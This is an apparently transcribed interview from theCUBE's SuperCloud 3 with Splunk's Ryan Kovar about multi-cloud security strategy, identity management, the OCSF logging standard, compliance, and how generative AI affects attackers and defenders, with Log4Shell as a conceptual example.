 Welcome back to SuperCloud 3. We're exploring the critical issues around cross-cloud security, the impact of AI, generative AI, and large language models on this space. And it's our pleasure to welcome Ryan Kovar, who's a distinguished security strategist at Splunk, Ryan. Good to see you, thanks for coming on. Very welcome to be here, so it's a good time. Yeah, so since you have strategy in your title, I got to go right to strategy. Can you detail the strategies that you've successfully implemented with customers to mitigate the inherent risks, security risks associated, but specifically with multi-cloud environments. You know, we're here talking about SuperCloud. I'm interested in things like data leakage, system vulnerabilities, misconfigurations across different clouds, the shared responsibility model nuances. Give us your best strategies there. I think you touched on a couple of key aspects that I like to go over with customers. I think there's a fallacy that people utilize one cloud. And I've yet to be to any company that's larger than pretty much a thousand people that only has one cloud service. Now they might say like, oh, we only use AWS, so we only use GCP. But the reality is they're also using cloud services for their HR, they're using cloud services for their meetings, they're using cloud services for their lunch orders. So a lot of times I find that their cloud policy or their cloud strategy is not holistic enough across those different areas. Now for any sort of threat modeling, it's often a great idea to just pick a small segment and work through that. So if we kind of concentrate on maybe the traditional, the, you know, the CSP cloud service providers, even then most people haven't put all their eggs in one basket. So they're utilizing AWS, they're using GCP, they're using Azure, they're using OCI, they're using some sort of variety of those. So what I really look at is all of those systems have some sort of IAM, identity access management plane. And that's really where I find the majority if it will say security strategy for the cloud comes in. People don't hack the cloud, they hack the user and the user is what allows them to have credentials and those credentials are how they log into the cloud. So for me, the strategy always starts with looking at the IAM plane and trying to figure out the ways you can best secure your assets through there. That is a money quote, people don't hack the cloud, they hack the user, the user is a lot more vulnerable than the cloud. Absolutely. And I like when you're talking, you know, the old days, the more things change, the more they stay the same. You know, the old days it was like, well, we're an IBM shop or we're a Microsoft shop or we're a Unix shop. And the reality was they were all those. It was a little bit of all of them. And now you just see that sort of brought to the cloud and obviously much more capabilities. But thinking about that cross-cloud context, how have you helped customers ensure, you know, one of the things that they want is a consistent security policy. This is where the notion of super cloud comes in. That's consistent policy enforcement. You mentioned identity of management across different cloud service providers, you know, taking into consideration the varying standards and practices. Is that on the technology supplier, you know, Splunk to create that sort of abstraction? Is it a combination of Splunk plus the customers, you know, doing their own middleware? How do you see that playing out? For me, that's a variety of different places. So there's compliance and regulatory requirements that go in. You know, it's been a while since I've renewed my CISSP, but this is also where policy and procedure come in. And then finally, this concept of detecting and remediating across all these different areas. So first off is creating a taxonomy, almost a data dictionary of understanding what each one of these cloud service providers offer. You know, there's going to be authentication logs. There's going to be change management logs. There's going to be these methods of detecting unusual activity. And then coming up with a common information model, as Splunk we call it, a common information model, that allows you to do detections regardless of what platform you're utilizing. So for me, that becomes essential, is really understanding what the events are that are gonna cause you the most pain and then trying to write universal detections as much as possible that hits across all those different places. And a lot of this comes down to just the hard yards of policy and procedures of making sure they're up to date, they're standardized and kept across all these different platforms. You know, Splunk's an interesting story because when you guys started, you solved the problem that really nobody was addressing well and you did it in a very efficient way. You had this mess and you helped make sense out of it. But as things evolve, you know, you get more clouds. How have you been able to address the challenge of visibility? I know observability is something that you guys think about a lot and basically getting that visibility and control over workloads in that multi-cloud environment, especially given that, you know, a lot of traditional tools and the tools that people use because there are many of them, as we talk about all the time in security, might not provide that level of detail. How do you deal with that problem? We've actually been spearheading an effort called the OCSF or Open Security Schema Framework, Open Cyber Security Schema Framework. There we go. I have my acronyms going. But the concept here is that the entire industry, not just Splunk, but there's dozens of partners now, I don't remember all the top of my head, who've come together and said, we should actually create a standard for how we log security events and security details. So that is actually one of the ways that we've looked at it here at Splunk is trying to say, we should have a universal taxonomy for these events, regardless of if you're Azure or Office 365 or whatever vendor you want, who's creating data in the cloud, everyone is facing the same threats. And at the end of the day, no matter how you're labeling it, they're going to be the same sort of events. So let's have a single method for all of us to use so that then we can all detect and remediate faster and more efficiently using those standards. Does that bleed into regulatory compliance, especially again, interested in the super cloud, multi-cloud context? In other words, incorporating the intricacies of different geographical regulations and the disparities in terms of security standards amongst different cloud providers or local laws, is that part of that scope? I don't think it's part of the scope on purpose, but it absolutely helps facilitate the ease for auditors and regulatory compliance. When I look at things like NIST 2 in Europe, when I look at some of the government standards that I used to hold when I was in the United States Department of Defense, these are places where a lot of your time is spent translating just what a technical term is to what you have. And so being able to have something that universally everyone knows, oh, this is what an IP address is. This is what an IAM event is. I will be extremely helpful to reduce that stress for an audit, for making sure that you're compliant and it's going to make it easier for bodies to do regulatory work. Let's also, let's shift gears a little bit and talk about AI and large language models. I'm interested in what your journey has been like. A lot of people have likened what they saw with ChatGPT as a Netscape moment, although it's different in the sense that the average person really didn't have access to the internet before web browsers came out, whereas AI has been around for a long, long time. Everybody we talked to says, well, we've been working on AI for a long time. It's just that the whole world wasn't as interested as they are since the AI heard around the world. So what's your AI and LLM journey been like and then we'll get into the sort of how it's changed since recent events? Sure, I haven't heard the Netscape metaphor. The one that I personally like is the day that ChatGPT was really released. It was the same way that you had Nokia and Motorola when Apple dropped the iPhone. There was definitely a moment where everyone said, oh, this is different. And that for me is the journey. The journey is that AI has been around for a very long time. Generative AI is something approachable and usable immediately by the majority of the population. So I really think that it was a watershed moment for technology. I think it will be seen as such. I think it will be just as big of a deal as when Google really hit the main world of like, oh, wow, we can actually find things easier. And for me, the journey has been just seeing the ease of use and looking at it not as an oracle with all the wisdom inside of it, but rather as an augmentation tool. It allows me to do things faster and allows me to evaluate and allows me to look at different biases. So I find to be a fantastic tool for work or it can be. It just has to be appropriately gated. So cloud is now code. And code is increasingly natural language, at least initiated through natural language. So how do you see that impacting your world? When I look at Generative AI, when I look at code, these are things like co-pilot from GitHub that was put out. I see a perfect example I gave is, I had a friend of mine who's a computer data scientist who used chat GPT and said, oh, you know, Generative AI isn't great. I gave it a mathematical proof from 1874 that was solved and it wasn't able to do it. And I said, well, I gave it a problem that I needed to fix with Python and it took me about 20 minutes to do where it would have taken me an hour and a half to do by myself. So I think what's going to happen is we're really going to lower the barrier of entry for development. I think it's going to provide a proxy for a lot of people to be able to go in without a super huge technical uplift to get to that first step. You're still going to need an adult in the room, if you will, to understand what those LLMs are doing, the large language models. You're still going to have to have someone who understands how this is all coming together. But I think a lot of that lower barrier to entry work will actually be automated or augmented very quickly by Generative AI. You know, the other thing too, it was interesting what you were saying about the Netscape moment versus the iPhone, which I think is a better analogy. At the same time, one of the things that we talk about a lot is, you remember dial-up modems, it was terrible, you know, your experience on the internet was terrible at first, but it was mind-blowing. And I would, I'd ask you to comment on, okay, so it may not be able to, AI may not be able to solve those difficult problems today, but with early days in terms of, you know, the steep S-curve that we're going to go on. And so when we look back 10 years from now, we're going to probably laugh at CPT. You know, I saw a first generation iPhone the other day and I thought it was a mouse. So kind of looking at it like, oh God, that really only has been around for 10 years. 100%, I think the, we don't even fully understand how much Generative AI is going to be part of our lives in some ways. I don't mean to jump on the bandwagon and just shout it from the rooftops, but I do think it's going to be in places that people are not expecting. I was in a conference earlier this year and there's an organization that was looking at how to defend against their user base using Generative AI. And so we're talking about how they had blocked it at the web proxy and they were looking at logs and they thought they had done a great job. And then they found out that their developers had actually put in API calls and they were doing hundreds of thousands of API calls a day to chat GPT or open AI. And they had no clue that had been built in their CIC pipeline. And I think that's going to continue to be the case. It is such a Pandora's boss of allowing people to work faster that even if you're blocking it on your corporate networks, people are going to be using it on their phones. There's going to be apps. There's going to be ways for people to use this that we are just not expecting yet. And if I had the imagination, I would be Ryan Kovar part of the hottest new AI startup rather than Singular Security Strategist. So it's simply something I'm looking forward to seeing and I think we're going to see a lot more of it. There's virtually no technology company it's on the vendor side or on the buy side. I mean, large financial institutions, large manufacturers. I can't think of one that's of a reasonable size that hasn't been using AI for some time. I mean, even the cube has been using forms of AI. And so I feel like, well, maybe not. I was going to say, did the technology industry prior to the awakening, if you will, in your view from a security standpoint have an advantage and that has that advantage now flipped at least in the near term. And what I'm going to get to is, will artificial intelligence ultimately be of greater benefit to attackers or defenders? I'm going to cut to the end of the question because I'm fascinated by that. I've had a lot of discussions. I truly believe the only people who are going to lose out because of generative AI are the people who are not embracing it. And that goes for adversaries and that also goes for network defenders. And the use case I would give is, if we go back to log4j, log4shell compromise last year, one of the largest compromises or security events in the last 10 years minus solar winds. You know, on Thursday night, the vulnerability kind of went out on Twitter. By Friday adversaries were actively writing compromises that were being sent over the wire. Network defenders worked all day on Friday and Saturday and they came up with network defenses against it. And by Monday adversaries had come up with ways to circumnavigate those defenses and then network defenders were working on ways to do that again. I look at that now and say, well, it took four days for that to occur. What if it takes four hours, right? And a perfect example that I can give again, I'm horrible at writing regular expressions to capture texts in a field. That's something I'm just not very good at. But it took me about two hours to write a rejects to capture malicious log4shell activity on a Saturday. I actually ran an experiment where I ran it again using chatGPT to guide me and it took about 20 minutes. So that right there was a huge reduction in time as a stat or as that augmentation tool. But we can also look at this as if you start having the ability to train LLMs against a code base that you know is vulnerable, you know, it took four or five days for new RCEs to come out for log4shell. Are we gonna see that go for four or five days to four or five hours? So once again, I think it is an incredible advantage for both parties. I think it kind of evens each other out, but the only ones who are not gonna succeed are the people who are not embracing it in some form or fashion somehow. So in the fullness of time, to sort of steal an Andy Jassy quote, everything gets escalated and everything gets compressed. But the attackers and defenders who would adopt and lean in are basically gonna be facing off again in similar fashion, just in a compressed timeframe. Absolutely. It absolutely turns into an arms race once again and these are the things we're gonna be dealing with. As the new technologies come out, they help network defenders, you know, just like the cloud. That was a huge uplift for the majority of organizations. But then you've come back full circle to 30 years ago where we had mainframes where all the eggs are in one basket. So now you're seeing where cases where an adversary does get into a cloud, they have full access to everything that that organization has. There was actually some value in having a data center that had a lot of different defense and depth and zones. But overall security was uplifted by going into a more centralized location, administered and protected by these large CSBs. Similarly, with generative AI, there's a lot of advantages for a network defense team but it's going to speed up the adversary's ability to pivot and to look through data. So I see as long as you're both using it, you're going to be much better off than if you avoid it. This does generative AI in your view, we talk a lot about security culture on the cube. I'm sure you do too. Does it, and how does it sort of change the security culture within organizations? I think one of the places it's going to help is actually by reducing a barrier to entry. So I've been a huge advocate and fan of hiring non-traditional cybersecurity professionals, specifically from places like liberal arts degrees where they have a ability to communicate, they have ability to synthesize information, to research information, but often when they start, they don't have the knowledge of the techno valuable. There was a great piece of work done by Thomas Ridd and some others at John Hopkins University where they actually taught a reverse engineer malware class over three days with journalists and non-technical people in the room. And for those of you not aware, reverse engineering and malware is one of the most technical skills in the network defense cybersecurity landscape. So taking a group of non-technical people and saying, we're going to teach you reverse engineering in a weekend is a pretty ambitious task. But the way that they did it was using chat GPT as a little study buddy. So the whole time as they had questions, they didn't have to ask, they didn't have to wait. They could ask iterative questions of this chat GPT client around the malware, around the tools, around the technologies. And they were up level themselves much faster in a method that they were comfortable with rather than having to wait for a pause and having a 30 people look and judge them. So I think it's going to be incredibly uplifting for a security organization if it's used in those sort of methods. You know, it's to your first point in this conversation that bad user behavior is going to trump good security technology every time. And to the extent that you can affect broader awareness from a security cultural standpoint. That's just, that's just goodness. Ryan, great conversation. Thanks so much for spending time at SuperCloud 3. Wonderful, good to see you again. Yeah, good to see you. All right, keep it right there for more content from our live studio in Palo Alto. And of course on demand SuperCloud 3 at thecube.net.